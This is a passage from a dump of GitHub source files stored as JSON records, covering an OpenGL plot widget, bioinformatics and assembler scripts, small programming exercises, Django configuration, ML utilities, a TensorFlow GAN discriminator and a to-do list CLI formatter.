mesh\n if not self.initialized: \n return\n self.arrayVbo.set_array(mesh.array)\n self.indexVbo.set_array(mesh.index)\n self.update()\n\n def paintGL(self):\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glColor(1,1,0)\n self.arrayVbo.bind()\n 
self.indexVbo.bind()\n\n gl.glEnableVertexAttribArray(0)\n gl.glVertexAttribPointer(0, 2, self.mesh.array_type, gl.GL_FALSE, 0, None)\n gl.glDrawElements(gl.GL_TRIANGLES, self.mesh.triangle_size, self.mesh.index_type, None)\n\n def paintBox(self):\n gl.glBegin(gl.GL_LINE_LOOP)\n gl.glColor(0,0,1)\n gl.glVertex2f(self.draginfo[0][0], self.draginfo[0][1])\n gl.glVertex2f(self.draginfo[1][0], self.draginfo[0][1])\n gl.glVertex2f(self.draginfo[1][0], self.draginfo[1][1])\n gl.glVertex2f(self.draginfo[0][0], self.draginfo[1][1])\n gl.glEnd()\n\n def resizeGL(self, width, height):\n \"\"\"Called upon window resizing: reinitialize the viewport.\n \"\"\"\n # update the window size\n self.width, self.height = width, height\n # paint within the whole window\n gl.glViewport(0, 0, width, height)\n # set orthographic projection (2D only)\n gl.glMatrixMode(gl.GL_PROJECTION)\n gl.glLoadIdentity()\n self.ar = width / float(height)\n # the window corner OpenGL coordinates are (-+1, -+1)\n gl.glOrtho(-1 * self.ar, 1 * self.ar, 1, -1, -1, 1)\n\n def screentoworld(self, x, y):\n return self.ar*(2*x/float(self.width)-1), 2*y/float(self.height)-1\n\n def updateselected(self):\n bb = (min(self.draginfo[:,0]),\n max(self.draginfo[:,0]),\n min(self.draginfo[:,1]),\n max(self.draginfo[:,1]))\n self.vselected = {v for v in self.graph.vs if inboundingbox(v[\"pos\"], bb)}\n\n def mousePressEvent(self, e):\n self.mousepressed = True\n self.draginfo[:] = self.screentoworld(e.x(), e.y())\n self.update()\n\n def mouseReleaseEvent(self, e):\n self.mousepressed = False\n self.draginfo[:,:] = 0\n self.update()\n\n def mouseMoveEvent(self, e):\n if self.mousepressed:\n self.draginfo[1] = self.screentoworld(e.x(), e.y())\n self.updateselected()\n self.update()\n\ndef inboudningbox(point, bb):\n return point >= bb[0] and point <= bb[1] and point >= bb[2] and point <= bb[3]\n","repo_name":"rasmusoh/gbox","sub_path":"src/widgets/plotwidget.py","file_name":"plotwidget.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23039844810","text":"#!/usr/bin/env python3\n\nimport argparse\nimport warnings\n\nparser = argparse.ArgumentParser(\n\tadd_help=False, # removes original [--help]\n\tdescription='''Script to join sequence and annotations in a simple way (alternative to gff_to fasta, if you don't\nhave a gff file)\nSequence's headers will be like this:\n> | Organism: | Description: \nExample:\n>g1.t1 | Organism: Homo sapiens | Description: Glucose-6-phosphate 1\n-dehydrogenase 5, cytoplasmic\t\t ''',\n\tepilog=\"\"\"We stand before the dawn of a new world.\"\"\", formatter_class=argparse.RawTextHelpFormatter\n)\n\nrequiredNamed = parser.add_argument_group('required arguments')\noptionalNamed = parser.add_argument_group('optional arguments')\n\n# mandatory arguments\n# type (default): string\n\nrequiredNamed.add_argument(\n\t'-annot', '--annotations', dest='annot',\n\tmetavar='[annotations.txt]',\n\thelp='File with id and annotation separated by \\t',\n\trequired=True\n)\n\nrequiredNamed.add_argument(\n\t'-b', '--basename', dest='basename',\n\tmetavar='[Jonas]',\n\thelp='It\\'s a boy, and will be called Jonas',\n\trequired=True\n)\n\nrequiredNamed.add_argument(\n\t'-faf', '--fasta', dest='seqs',\n\tmetavar='[fasta.fasta]',\n\thelp='Fasta file with protein sequences, extracted from augustus gff',\n\trequired=True\n)\n\nrequiredNamed.add_argument(\n\t'-org', '--organism', dest='org',\n\tmetavar='[Homo sapiens]',\n\thelp='Organism 
name. PS: if you want to pass genus and species give it with \" - ex: \"Homo Sapiens\"',\n\trequired=True\n)\n\n# custom [--help] argument\noptionalNamed.add_argument(\n\t'-h', '-help', '--help',\n\taction='help',\n\tdefault=argparse.SUPPRESS, # hidden argument\n\thelp='It\\'s going to be legen - wait for it - dary!'\n)\n\n# --------------------------------------------------------\n\n# arguments saved here\nargs = parser.parse_args()\n\n# Info from annotation will be stored here\nant = {}\n\n# ============================= Extract annotations ==========================\n\nannot = open(str(args.annot)).read().splitlines()\nfor line in annot:\n\tline = line.split(\"\\t\")\n\tant[line[0]] = line[1]\n\nfasta = open(str(args.seqs), \"r\").read().split(\">\")\ndel fasta[0] # remove empty value\n\n# ============== Write fasta file with new header ==========================\n\nout = open(f\"AnnotaPipeline_{str(args.basename)}_proteins.fasta\", \"w\")\nids_warn = [] # store ids with no annotation\nfor sequence in fasta:\n\tsequence = sequence.split(\"\\n\")\n\tid = sequence[0]\n\ttry:\n\t\tout.write(f\">{str(id)} | Organism: {str(args.org)} | Description: {str(ant[id])}\\n\")\n\t\tout.write(str(\"\\n\".join(sequence[1:])))\n\texcept Exception as warn:\n\t\tids_warn.append(id)\n\t\tpass\n\nout.close()\n\n# =============== Warning message, if something goes wrong =====================\n\nif len(ids_warn) > 0:\n\twarnings.warn(\"WARNING: Not all sequences from fasta file were in annotation file\", stacklevel=2)\n\twarn_seq = open(f\"{str(args.basename)}_ids_with_no_annotations.txt\", \"w\")\n\tfor a in ids_warn:\n\t\twarn_seq.write(str(a) + \"\\n\")\n\twarn_seq.close()\n\twarnings.warn(\"INFO: IDs stored in ids_with_no_annotations.txt\", stacklevel=2)","repo_name":"bioinformatics-ufsc/AnnotaPipeline","sub_path":"Scripts/fasta_simple.py","file_name":"fasta_simple.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"42597468288","text":"import re\nfrom typing import (\n List,\n Optional,\n Tuple,\n)\nfrom machine.isa import INSTRUCTION_TYPES, OperandType, Opcode, Operand, Instruction\n\nNUMBER = r'-?[0-9]+'\nLABEL = r'\\.?[A-Za-z_]+'\nSTRING = r'^(\\'.*\\')|(\\\".*\\\")$'\n\n\ndef parse_label(val: str) -> Optional[str]:\n label = re.match(LABEL, val)\n if label:\n return label[0][:-1]\n return None\n\n\ndef parse_operand(operand: str) -> Operand:\n if parse_label(operand) or parse_label(operand[1:]):\n return Operand(OperandType.LABEL_TO_REPLACE, operand)\n elif operand.startswith('#'):\n return Operand(OperandType.CONSTANT, int(operand[1:]))\n elif operand.startswith('$'):\n return Operand(OperandType.INDIRECT_ADDRESS, int(operand[1:]))\n else:\n return Operand(OperandType.DIRECT_ADDRESS, int(operand))\n\n\ndef parse_instruction(line: str) -> Instruction:\n tokens = line.split()\n assert len(tokens) > 0, 'no tokens in the line'\n\n instr_type = INSTRUCTION_TYPES[tokens[0]]\n operand = None\n if len(tokens) == 2:\n operand = parse_operand(tokens[1])\n return Instruction(instr_type.opcode, operand)\n\n\ndef prepare_code(code: List[str]) -> str:\n prepared_code = map(lambda l: re.sub(r';.*', '', l), code) # remove comments\n prepared_code = map(str.strip, prepared_code) # remove indents\n prepared_code = filter(bool, prepared_code) # remove empty lines\n prepared_code = map(lambda l: re.sub(r'\\s+', ' ', l), prepared_code) # remove extra spaces\n return '\\n'.join(prepared_code)\n\n\ndef 
parse_data_block(data_block_text: str) -> Tuple[list, dict]:\n data_memory = []\n data_memory_map = {}\n for line in data_block_text.split('\\n'):\n label, val = line.split(':', 1)\n if val.startswith(' word '): # word 23\n data_memory_map[label] = len(data_memory)\n num = int(val[len(' word '):])\n data_memory.append(num)\n elif val.startswith(' db \"'): # db \"string\"\n data_memory_map[label] = len(data_memory)\n string = str(val[len(' db \"'):-1]).replace('\\\\n', '\\n').replace('\\\\t', '\\t').replace('\\\\r', '\\r')\n for char in string:\n data_memory.append(ord(char))\n else:\n assert True, \"unexpected value in data section\"\n return data_memory, data_memory_map\n\n\ndef parse_text_block(text_block_text: str):\n labels_map = {}\n instructions = []\n for line in text_block_text.split('\\n'):\n if ':' in line:\n label, *_ = map(str.strip, line.split(':', 1))\n labels_map[label] = len(instructions)\n else:\n instruction = parse_instruction(line)\n instructions.append(instruction)\n return instructions, labels_map\n\n\ndef update_instructions_with_labels(instructions: List[Instruction], data_labels: dict, code_labels: dict):\n new_instr = []\n for instruction in instructions:\n if instruction.operand and instruction.operand.type == OperandType.LABEL_TO_REPLACE:\n if INSTRUCTION_TYPES[instruction.opcode].is_data_operand:\n if instruction.operand.value.startswith('$'):\n op = data_labels[instruction.operand.value[1:]]\n new_instr.append(Instruction(instruction.opcode, Operand(OperandType.INDIRECT_ADDRESS, op)))\n else:\n op = data_labels[instruction.operand.value]\n new_instr.append(Instruction(instruction.opcode, Operand(OperandType.DIRECT_ADDRESS, op)))\n else:\n if instruction.operand.value.startswith('.'):\n op = code_labels[instruction.operand.value[1:]]\n new_instr.append(Instruction(instruction.opcode, Operand(OperandType.DIRECT_ADDRESS, op)))\n else:\n op = code_labels[instruction.operand.value]\n new_instr.append(Instruction(instruction.opcode, Operand(OperandType.DIRECT_ADDRESS, op)))\n\n if new_instr[-1].opcode == Opcode.ST or new_instr[-1].opcode == Opcode.JMP or \\\n new_instr[-1].opcode == Opcode.JE: # dirty hack for st/jmp/je etc.\n if new_instr[-1].operand.type == OperandType.DIRECT_ADDRESS:\n new_instr[-1] = Instruction(instruction.opcode, Operand(OperandType.CONSTANT, op))\n elif new_instr[-1].operand.type == OperandType.INDIRECT_ADDRESS:\n new_instr[-1] = Instruction(instruction.opcode, Operand(OperandType.DIRECT_ADDRESS, op))\n else:\n assert False, \"something wrong with st/jmp/je \"\n else:\n new_instr.append(instruction)\n return new_instr\n\n\ndef parse_code(code_text) -> Tuple[list[int], list[Instruction]]:\n code = prepare_code(code_text)\n data_index = code.find('section .data')\n assert data_index != -1, \"no .data section in the code!\"\n text_index = code.find('section .text')\n assert data_index != -1, \"no .text section in the code!\"\n\n if data_index < text_index:\n data_block = code[data_index + len('section .data') + 1: text_index - 1]\n text_block = code[text_index + len('section .text') + 1:]\n else:\n text_block = code[text_index + len('section .text') + 1: data_index - 1]\n data_block = code[data_index + len('section .data') + 1:]\n\n data_memory, data_memory_map = parse_data_block(data_block)\n instructions, instructions_labels_map = parse_text_block(text_block)\n replaced_instr = update_instructions_with_labels(instructions, data_memory_map, instructions_labels_map)\n return data_memory, 
replaced_instr\n","repo_name":"thematver/itmo","sub_path":"Архитектура компьютеров/Лабораторная 3/machine/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8106559791","text":"n, m = map(int, input().split())\n\na = set()\nb = set()\n\nfor i in range(n):\n string = input()\n a.add(string)\nfor i in range(m):\n string = input()\n b.add(string)\n \nresult = list(a&b)\nresult.sort()\nprint(len(result))\nfor val in result:\n print(val)","repo_name":"micopes/Algorithm","sub_path":"알고리즘 - 파이썬/백준(acmicpc.net)/기타/1764 듣보잡 - set() 이용.py","file_name":"1764 듣보잡 - set() 이용.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"70316696649","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('world', '0005_auto_20150324_2057'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='impactzone',\n name='feature',\n field=models.ForeignKey(to='world.ImpactZoneClass'),\n preserve_default=True,\n ),\n ]\n","repo_name":"Oregon-Public-Broadcasting/earthquake-preparedness","sub_path":"world/migrations/0006_auto_20150324_2109.py","file_name":"0006_auto_20150324_2109.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"70817456967","text":"def reverse(stri):\n mylist=[]\n for i in range(len(stri)-1,-1,-1):\n mylist.append(stri[i])\n return ''.join(mylist)\n\nx=reverse('I am theja')\nprint(x) \n\n# or just stri[::-1]","repo_name":"theja-m/Data-Structures-and-Algorithms","sub_path":"Data Structures - Arrays/Reversing a string.py","file_name":"Reversing a string.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":1254,"dataset":"github-code","pt":"16"} +{"seq_id":"1085651726","text":"import puzzle\nfrom datetime import datetime\n\n\ndef main(input):\n print('### day 25 ###')\n start1 = datetime.now()\n p1res = part1(input)\n stop1 = datetime.now()\n print(f'p1: {p1res}')\n print(f'p1 took: {stop1 - start1}\\n')\n\n\ndef part1(input: str) -> int:\n card_public_key, door_public_key = get_input(input)\n card_loop_size = find_loop_size(card_public_key, 7)\n print('card loop size', card_loop_size)\n door_loop_size = find_loop_size(door_public_key, 7)\n print('door loop size', door_loop_size)\n\n return transform(door_public_key, card_loop_size)\n\n\ndef find_loop_size(public_key, subject_number):\n secret_loop_size = 0\n v = 1\n while v != public_key:\n secret_loop_size += 1\n v = transform_step(v, subject_number)\n return secret_loop_size\n\n\ndef transform(subject_number, loop_size):\n v = 1\n for i in range(loop_size):\n v = transform_step(v, subject_number)\n return v\n\n\ndef transform_step(value, subject_number) -> int:\n value *= subject_number\n return value % 20201227\n\n\ndef get_input(input: str):\n lines = input.split('\\n')\n public_key_card = int(lines[0])\n public_key_door = int(lines[1])\n return public_key_card, public_key_door\n\n\nif __name__ == \"__main__\":\n 
main(puzzle.input)\n","repo_name":"rickardenglund/AoC2020","sub_path":"days/25/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9593925448","text":"import torch\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom Preprocessing import *\nfrom sklearn.metrics import balanced_accuracy_score, roc_auc_score,accuracy_score,precision_recall_fscore_support\nfrom Misc import *\n\n# +\ndef get_dt_ids(df=None):\n if df is None:\n df = load_digital_twin()\n return df.id.values\n\ndef mc_loss(ytrue,ypred,weights=None):\n #this is just the multiclass loss now\n loss = torch.nn.CrossEntropyLoss(weight=weights)\n return loss(ypred,ytrue.argmax(axis=1))\n\n\n# -\n\ndef get_tt_split(ids=None,use_default_split=True,use_bagging_split=False,resample_training=False,df=None):\n if ids is None:\n ids = get_dt_ids(df)\n #pre-made, stratified by decision and outcome 72:28\n if use_default_split:\n train_ids = Const.stratified_train_ids[:]\n test_ids = Const.stratified_test_ids[:]\n elif use_bagging_split:\n train_ids = np.random.choice(ids,len(ids),replace=True)\n test_ids = [i for i in ids if i not in train_ids]\n else:\n test_ids = ids[0: int(len(ids)*(1-split))]\n train_ids = [i for i in ids if i not in test_ids]\n\n if resample_training:\n train_ids = np.random.choice(train_ids,len(train_ids),replace=True)\n test_ids = [i for i in ids if i not in train_ids]\n return train_ids,test_ids\n\ndef transition_sample(state,dataset=None):\n if dataset is None:\n dataset = DTDataset()\n \n ids = get_dt_ids(dataset.processed_df.reset_index())\n \n train_ids, test_ids = get_tt_split(dataset.processed_df.reset_index())\n \n #only train on people with IC for state 1 since other people can't have any outcomes otherwise\n require = None\n if state == 1:\n require = Const.decisions[0] #we don't expect a state update if there is no treatment\n valid_ids = dataset.get_input_state(require=require).index.values\n train_ids = [t for t in train_ids if t in valid_ids]\n test_ids = [t for t in test_ids if t in valid_ids]\n xtrain = dataset.get_input_state(step=state,ids=train_ids,require=require)\n xtest = dataset.get_input_state(step=state,ids=test_ids,require=require)\n ytrain = dataset.get_intermediate_outcomes(step=state,ids=train_ids,require=require)\n ytest = dataset.get_intermediate_outcomes(step=state,ids=test_ids,require=require)\n\n xtrain = df_to_torch(xtrain)\n xtest = df_to_torch(xtest)\n ytrain = [df_to_torch(t) for t in ytrain]\n ytest= [df_to_torch(t) for t in ytest]\n return xtrain,xtest,ytrain,ytest\n\n\n\n\n\n# +\ndef load_models():\n files = [\n '../resources/decision_model.pt',\n '../resources/transition1_model.pt',\n '../resources/transition2_model.pt',\n '../resources/outcome_model.pt',\n '../resources/outcomeDSM.pt',\n ]\n return [torch.load(file) for file in files]\n\n\ndef load_transition_models():\n files = [\n '../resources/transition1_model.pt',\n '../resources/transition2_model.pt',\n '../resources/outcome_model.pt',\n '../resources/outcomeDSM.pt'\n ]\n return [torch.load(file) for file in files]\n\n\n# +\ndef load_sklearn_transition_models():\n model_names = ['transition1_model.pickle','transition2_model.pickle','outcome_model.pickle']\n success = []\n for mname in model_names:\n try:\n name = '../resources/sklearn_models/' + mname\n with open(name,'rb') as f:\n model = pickle.load(f)\n success.append(model)\n except Exception as e:\n success.append(False)\n 
print(e)\n return success\n\ndef get_weights(df_list,scale = None,to_torch=True):\n getw = lambda df: df.shape[0]/(df.shape[1]*df.sum(axis=0)).values\n w = [getw(df) for df in df_list]\n\n if scale is not None:\n w = [scale(ww) for ww in w]\n if to_torch:\n return [torch.FloatTensor(ww) for ww in w]\n return w\n\n\n# +\ndef mc_metrics(yt,yp,numpy=False,is_dlt=False,is_squeezed=False):\n if not numpy:\n yt = yt.cpu().detach().numpy()\n yp = yp.cpu().detach().numpy()\n #dlt prediction (binary)\n if is_dlt:\n acc = accuracy_score(yt,yp>.5)\n if yt.sum() > 1:\n auc = roc_auc_score(yt,yp)\n else:\n auc=-1\n error = np.mean((yt-yp)**2)\n return {'accuracy': acc, 'mse': error, 'auc': auc}\n #this is a catch for when I se the dlt prediction format (encoded integer ordinal, predict as a categorical and take the argmax)\n elif yt.ndim > 1 or is_squeezed:\n try:\n bacc = balanced_accuracy_score(yt.argmax(axis=1),yp.argmax(axis=1))\n except:\n bacc = -1\n try:\n roc_micro = roc_auc_score(yt,yp,average='micro')\n except:\n roc_micro=-1\n try:\n roc_macro = roc_auc_score(yt,yp,average='macro')\n except Exception as e:\n try: \n roc_macro = roc_auc_score(yt[:,0:2],yp[:,0:2],average='macro')\n except:\n roc_macro = -1\n try:\n roc_weighted = roc_auc_score(yt,yp,average='weighted')\n except:\n try:\n roc_weighted = roc_auc_score(yt[:,0:2],yp[:,0:2],average='weighted')\n except:\n roc_weighted= -1\n return {'accuracy': bacc, 'auc_micro': roc_micro,'auc_mean': roc_macro,'auc_weighted': roc_weighted}\n #outcomes (binary)\n else:\n multiclass = yp.ndim > 1\n if multiclass:\n yp = yp.argmax(axis=1)\n try:\n if not multiclass:\n bacc = accuracy_score(yt,(yp>.5).astype(int))\n else:\n bacc = accuracy_score(yt,yp)\n except Exception as e:\n print(e,yp,yt)\n bacc = -1\n try:\n roc = roc_auc_score(yt,yp)\n except:\n roc = -1\n try:\n if not multiclass:\n pr,re,fscore,supp = precision_recall_fscore_support(yt,(yp>.5).astype(int),average='binary')\n else:\n pr,re,fscore,supp = precision_recall_fscore_support(yt,yp,average='macro')\n except Exception as e:\n print(e)\n [pr,re,fscore,supp] = [-1,-1,-1,-1]\n error = np.mean((yt-yp)**2)\n return {'accuracy': bacc, 'mse': error, 'auc': roc,'precision': pr,'recall':re,'f1':fscore}\n\ndef state_metrics(ytrue,ypred,numpy=False):\n pd_metrics = mc_metrics(ytrue[0],ypred[0],numpy=numpy)\n nd_metrics = mc_metrics(ytrue[1],ypred[1],numpy=numpy)\n mod_metrics = mc_metrics(ytrue[1],ypred[1],numpy=numpy)\n \n dlt_metrics = []\n dlt_true = ytrue[3]\n dlt_pred = ypred[3]\n ndlt = dlt_true.shape[1]\n nloss = torch.nn.NLLLoss()\n for i in range(ndlt):\n dm = mc_metrics(dlt_true[:,i],dlt_pred[:,i].view(-1),is_dlt=True)\n dlt_metrics.append(dm)\n dlt_acc =[d['accuracy'] for d in dlt_metrics]\n dlt_error = [d['mse'] for d in dlt_metrics]\n dlt_auc = [d['auc'] for d in dlt_metrics]\n \n acc_mean = np.mean([a for a in dlt_acc if a >= 0 and a < 1])\n auc_mean = np.mean([a for a in dlt_auc if a >= 0])\n results = {'pd': pd_metrics,'nd': nd_metrics,'mod': mod_metrics,\n 'dlts': {'accuracy': dlt_acc,'accuracy_mean': acc_mean,'auc': dlt_auc,'auc_mean': auc_mean}\n }\n return results\ndef outcome_metrics(ytrue,ypred,numpy=False):\n res = {}\n for i, outcome in enumerate(Const.outcomes):\n metrics = mc_metrics(ytrue[i],ypred[:,i])\n res[outcome] = metrics\n return res\n\ndef baseline_mc_metrics(yt,yp):\n #this is a catch for when I se the dlt prediction format (encoded integer ordinal, predict as a categorical and take the argmax)\n try:\n bacc = balanced_accuracy_score(yt,np.argmax(yp,axis=1))\n 
except Exception as e:\n print('bacc',e)\n bacc = -1\n try:\n roc_micro = roc_auc_score(yt,yp,average='macro',multi_class='ovr')\n except Exception as e:\n print('micro',e)\n roc_micro = -1\n try:\n roc_macro = roc_auc_score(yt,yp,average='macro',multi_class='ovr')\n except Exception as e:\n print('macro',e)\n roc_macro = -1\n try:\n roc_weighted = roc_auc_score(yt,yp,average='weighted',multi_class='ovr')\n except Exception as e:\n print('weighted',e)\n roc_weighted= -1\n return {'accuracy': bacc,'auc_micro':roc_micro,'auc_mean':roc_macro,'auc_weighted':roc_weighted}\n \ndef boolean_metrics(yt,yp,yp_bool=None):\n if yp_bool is None:\n yp_bool = yp > .5\n precision, recall, f1, support = precision_recall_fscore_support(yt,yp_bool,pos_label=1,average='binary')\n auc = roc_auc_score(yt,yp)\n return {'auc': auc, 'f1': f1, 'precision': precision, 'recall':recall}\n\n","repo_name":"tehwentzel/DigitalTwinVis","sub_path":"Backend/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18039355394","text":"from django.urls import path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import BookViewSet, JournalViewSet, BookListCreateAPIView, JournalListCreateAPIView\n\n\nurlpatterns = [\n path('books/', BookListCreateAPIView.as_view()),\n path('journals/', JournalListCreateAPIView.as_view()),\n]\n\nrouter = DefaultRouter()\n\nrouter.register('books', BookViewSet, basename='books')\nrouter.register('journals', JournalViewSet, basename='journal')\nurlpatterns += router.urls\n","repo_name":"Alibek120699/BFDjango","sub_path":"midterm/book_store/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41630235562","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\ndef cosine_similarity(a,b):\r\n normalize_a = tf.nn.l2_normalize(a, -1)\r\n normalize_b = tf.nn.l2_normalize(b, -1)\r\n cos_similarity = (tf.multiply(normalize_a, normalize_b))\r\n return cos_similarity\r\n\r\n# The highway layer is borrowed from https://github.com/mkroutikov/tf-lstm-char-cnn\r\ndef linear(input_, output_size, scope=None):\r\n shape = input_.get_shape().as_list()\r\n if len(shape) != 2:\r\n raise ValueError(\"Linear is expecting 2D arguments: %s\" % str(shape))\r\n if not shape[1]:\r\n raise ValueError(\"Linear expects shape[1] of arguments: %s\" % str(shape))\r\n input_size = shape[1]\r\n with tf.variable_scope(scope or \"SimpleLinear\"):\r\n matrix = tf.get_variable(\"Matrix\", [output_size, input_size], dtype=input_.dtype)\r\n bias_term = tf.get_variable(\"Bias\", [output_size], dtype=input_.dtype)\r\n\r\n return tf.matmul(input_, tf.transpose(matrix)) + bias_term\r\n\r\n\r\ndef highway(input_, size, num_layers=1, bias=-2.0, f=tf.nn.relu, scope='Highway'):\r\n \"\"\"Highway Network (cf. http://arxiv.org/abs/1505.00387).\r\n t = sigmoid(Wy + b)\r\n z = t * g(Wy + b) + (1 - t) * y\r\n where g is nonlinearity, t is transform gate, and (1 - t) is carry gate.\r\n \"\"\"\r\n with tf.variable_scope(scope):\r\n for idx in range(num_layers):\r\n g = f(linear(input_, size, scope='highway_lin_%d' % idx))\r\n\r\n t = tf.sigmoid(linear(input_, size, scope='highway_gate_%d' % idx) + bias)\r\n\r\n output = t * g + (1. 
- t) * input_\r\n input_ = output\r\n return output\r\n\r\nclass Discriminator(object):\r\n def __init__(self, sequence_length, num_classes, vocab_size,dis_emb_dim,filter_sizes, num_filters,batch_size,hidden_dim,\r\n start_token,goal_out_size,step_size,LikeWord, StrucWord,word_tag_index,tag_prob_list,l2_reg_lambda=0.0, dropout_keep_prob=0.75 ):\r\n self.sequence_length = sequence_length\r\n self.num_classes = num_classes\r\n self.vocab_size = vocab_size\r\n self.dis_emb_dim = dis_emb_dim\r\n self.filter_sizes = filter_sizes\r\n self.num_filters = num_filters\r\n self.batch_size = batch_size\r\n self.hidden_dim = hidden_dim\r\n self.start_token = tf.constant([start_token] * self.batch_size, dtype=tf.int32)\r\n self.l2_reg_lambda = l2_reg_lambda\r\n self.num_filters_total = sum(self.num_filters)\r\n self.temperature = 1.0\r\n self.grad_clip = 5.0\r\n self.goal_out_size = goal_out_size\r\n self.step_size = step_size\r\n self.dropout_keep_prob = dropout_keep_prob\r\n self.LikeWord = LikeWord\r\n self.StrucWord = StrucWord\r\n self.D_input_y = tf.placeholder(tf.float32, [None, num_classes], name=\"input_y\")\r\n self.D_input_x = tf.placeholder(tf.int32, [None, sequence_length], name=\"input_x\")\r\n self.word_tag_index = word_tag_index\r\n self.tag_prob_list = tag_prob_list\r\n self.tag_len = 39\r\n self.max_word = max([int(x) for x in word_tag_index.keys()])\r\n self.WordTagIndexArray = tf.TensorArray(dtype=tf.int32, size=0,\r\n dynamic_size=True, infer_shape=True, clear_after_read=False)\r\n self.TagProbArray = tf.TensorArray(dtype=tf.float32, size=0,\r\n dynamic_size=True, infer_shape=True, clear_after_read=False) \r\n \r\n for i in range(len(tag_prob_list)):\r\n self.TagProbArray = self.TagProbArray.write(i,self.tag_prob_list[i])\r\n for word in self.word_tag_index.keys():\r\n self.WordTagIndexArray = self.WordTagIndexArray.write(int(word),self.word_tag_index[word])\r\n \r\n with tf.name_scope('D_update'):\r\n self.D_l2_loss = tf.constant(0.0)\r\n self.FeatureExtractor_unit = self.FeatureExtractor()\r\n\r\n # Train for Discriminator\r\n with tf.variable_scope(\"feature\") as self.feature_scope:\r\n D_feature = self.FeatureExtractor_unit(self.D_input_x,self.dropout_keep_prob)#,self.dropout_keep_prob)\r\n self.feature_scope.reuse_variables()\r\n\r\n D_scores, D_predictions,self.ypred_for_auc = self.classification(D_feature)\r\n losses = tf.nn.softmax_cross_entropy_with_logits(logits=D_scores, labels=self.D_input_y)\r\n self.D_loss = tf.reduce_mean(losses) + self.l2_reg_lambda * self.D_l2_loss\r\n\r\n self.D_params = [param for param in tf.trainable_variables() if\r\n 'Discriminator' or 'FeatureExtractor' in param.name]\r\n d_optimizer = tf.train.AdamOptimizer(5e-5)\r\n D_grads_and_vars = d_optimizer.compute_gradients(self.D_loss, self.D_params, aggregation_method=2)\r\n self.D_train_op = d_optimizer.apply_gradients(D_grads_and_vars)\r\n \r\n # This module used to Extract sentence's Feature\r\n def FeatureExtractor(self):\r\n def unit(Feature_input,dropout_keep_prob):#,dropout_keep_prob):\r\n with tf.variable_scope('FeatureExtractor') as scope:\r\n with tf.device('/cpu:0'), tf.name_scope(\"embedding\") as scope:\r\n W_fe = tf.get_variable(\r\n name=\"W_fe\",\r\n initializer=tf.random_uniform([self.vocab_size + 1, self.dis_emb_dim], -1.0, 1.0)) #word embedding random initial\r\n self.LikeWord = [int(x) for x in self.LikeWord]\r\n self.LikeWordEmb = tf.nn.embedding_lookup(W_fe,self.LikeWord)\r\n self.StrucWord = [int(x) for x in self.StrucWord]\r\n self.StrucWordEmb = 
tf.nn.embedding_lookup(W_fe,self.StrucWord)\r\n self.TempSeqLen = self.sequence_length\r\n self.TempSeqLen_ = self.sequence_length\r\n self.MaxWord = self.max_word\r\n self.TagLen = self.tag_len\r\n self.DisEmbDim = self.dis_emb_dim\r\n def high_fn(feature):\r\n temp,word_vec,flag = tf.map_fn(low_fn,feature,dtype=(tf.float32,tf.float32,tf.int32))\r\n def cond_bi(i,Temp,feature,temp,OldTag,OldProb,NewTag,NewProb,const,t):\r\n return i3.3} {c1}{content}{c0}\\n {c3}{project_name:22.22}{c4} {label_names:22.22} {c2}Due: {due:12.12}{c0} [{taskid}]\\n',\n 'project': '\\n{color}#{project_name}\\n',\n 'unknown': '',\n }\n \n @staticmethod\n def task(obj):\n indent = ' ' * (int(obj.get('indent', '1')) - 1)\n priority = ' '\n if obj.priority and obj.priority != 1:\n priority = '!' * (obj.priority - 1)\n due = obj.get_date()\n if due:\n due += ' '\n print(Plain.FORMAT['task'].format(c0=colors.ENDC,\n c1=colors.CONTENT,\n c2=colors.DATE,\n c3=colors.PROJECT,\n c4=colors.LABEL,\n c5=colors.PRIORITY,\n\t\t\t\t\t indent=indent,\n priority=priority,\n content=obj.get('content'),\n project_name=obj.get('project_name'),\n label_names=obj.get('label_names'),\n due=due,\n taskid=obj.get('id')), end='')\n\n @staticmethod\n def task_set(obj):\n color = Plain.COLORS[obj.set_type]\n print(Plain.FORMAT[obj.set_type].format(color=color,\n **obj.raw), end='')\n for task in obj:\n Plain.task(task)\n\n @staticmethod\n def result_set(obj):\n if obj.name:\n print('{}{}\\n{}{}'.format(colors.FILTER, obj.name,\n ''.join('=' for _ in obj.name or ''),\n colors.ENDC))\n for task_set in obj.task_sets:\n Plain.task_set(task_set)\n if obj.tasks:\n Plain.task_set(obj.tasks)\n\nclass Org:\n PRIORITY = { 1: '', 2: 'C', 3: 'B', 4: 'A' }\n DATE = 'DEADLINE: <{} {}>'\n NAMES = {\n 'project': '{project_name}',\n 'unknown': '',\n }\n \n @staticmethod\n def task(obj, level=2):\n stars = ('*' * (level - 1)) + ('*' * (int(obj.get('indent', '1'))))\n indent = ' ' * (len(stars) + 1)\n priority = 